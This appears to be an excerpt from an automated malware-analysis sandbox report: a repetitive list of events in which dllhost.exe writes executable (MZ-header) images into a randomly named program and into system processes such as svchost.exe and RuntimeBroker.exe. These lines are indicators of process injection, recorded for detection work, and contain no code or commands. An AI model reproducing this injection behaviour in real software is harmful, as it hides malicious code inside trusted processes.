Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: C50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\zNYWHfjgcSgmqDXvChyvsoLXWayYbshDaCgBrpZGZuAkXLptsQQRSRxCKctBELNIetLrffgWLCll\BilprMfofVNUSgyvlLDDZYLfhZ.exe base: F30000 value starts with: 4D5A
